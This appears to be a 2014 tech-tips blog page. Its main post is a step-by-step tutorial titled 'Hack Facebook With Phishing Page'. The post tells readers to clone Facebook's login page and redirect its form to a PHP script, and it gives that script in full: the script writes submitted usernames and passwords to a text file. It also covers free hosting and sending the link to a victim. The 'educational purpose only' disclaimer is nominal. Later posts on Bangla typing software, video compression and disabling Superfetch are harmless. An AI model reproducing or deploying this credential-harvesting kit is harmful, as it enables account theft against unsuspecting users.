Friday, September 12, 2014

Hack Facebook With Phishing Page (Educational Purpose Only)

Phishing:

Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.

Steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.





2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.

3.Now open the notepad and press CTRL+F,and type ACTION



4.You will have to find a text which looks like ...
                                  action="https://www.facebook.com/login.php?login_attempt=1"
5.delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                 action="post.php"

6.Now save it on your desktop with the name index.htm,not index.html,remember?

7.Open a new notepad and save the given data with the name post.php

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 


8.You have two files now one is index.htm and another is post.php,remember file extension is important.

9.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com







10.You have to make a account in that ,after that it looks 
like a picture given below.




 
11.Now go control pannel,then on file manager

12.After that a new window will pop up.Now go to public_html




13.Delete the file named default.php,after that upload two files index.htm and post.php one by one.




14.Now the last step click on view of index.htm it will look same as facebook page.




15.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

16.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt






17.Click on view now u will have your friend's password and email id




18.This is a simple trick to hack any Facebook password account by phishing page.

NOTE ~~~>

Phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps...
u can hack Gmail,Yahoo,Orkut,Twitter and many more...

Like us on Facebook ~~> Computer Tips & Digital Challenges

Thursday, August 28, 2014

How to get Avro Keyboard (Freeware)

Avro Keyboard (Freeware) 


Avro Keyboard is the first free Bangla/Bengali typing software for Windows. Type Bangla anywhere- write documents, spreadsheets, send Bangla email, chat in Bangla, write Bangla blog or design Bangla web pages, anything is possible! Completely Unicode complaint. It can be found in a portable version as well. So that you can use it on any computer.



Download Section



Click on your desired edition 





Wednesday, August 27, 2014

Compress Video Size 50-90% Without Losing Quality

First of all we need a program called HandBrake

Download it by clicking on the text above. It will redirect you to the official download page of HandBrake.

Once you have downloaded the program. Install it (Its very easy to install, so I'm not mentioning it in this tutorial).
The real trick is hidden in the settings of the program.

Step 1. 

Open the program > Choose which video you want to compress > Select the destination to the desktop (Or anywhere easy to find)  



Step 2.

Go to Video tab > Change Constant Quality to 25 & Framerate (FPS) to 29.97 > Tick Use Advance Tab instead  



Step 3.

Click on Audio tab > Change Bitrate to 160




Step 4.

Click on Advance tab > Change Reference Frames to 16 



Step 5.

Now just click on Start to begin the process 



Wait until the process is done 

I will compare Size & Quality in next post 

Sorry for my bad English. I'm not from an English speaking 
country

Speed Up Slow Computer By Turning Off Superfetch

First of all we need to know, what is 'superfetch'

Superfetch service is the latest version of 'prefetch' technology introduced for windows XP. Superfetch enables windows Vista/7/8/8.1 to learn which programs you use frequently and at what time you start them.   
However, it should not be maxing out your processor. If it is slowing down your computer, you can easily disable it. 

Disabling 'Superfetch' 

Step 1 .. => 
Go to Run (Keyboard Shortcut is, window+R)  > In open bar type, "Services.msc" > Hit Enter 


Step 2 .. => 
A window will pop up > Now you need to find 'Superfetch' in the list of services (All services are arranged alphabetically) 
































Step 3 .. => 
Right click on the service > Click properties > Change the Startup type to "Disabled" > Click Apply and OK > Now you are done (Restart your computer to take effect)



Now your computer will use much less Ram than before. So, your computer will speed up naturally

Sorry for my bad English. I'm not from an English speaking 
country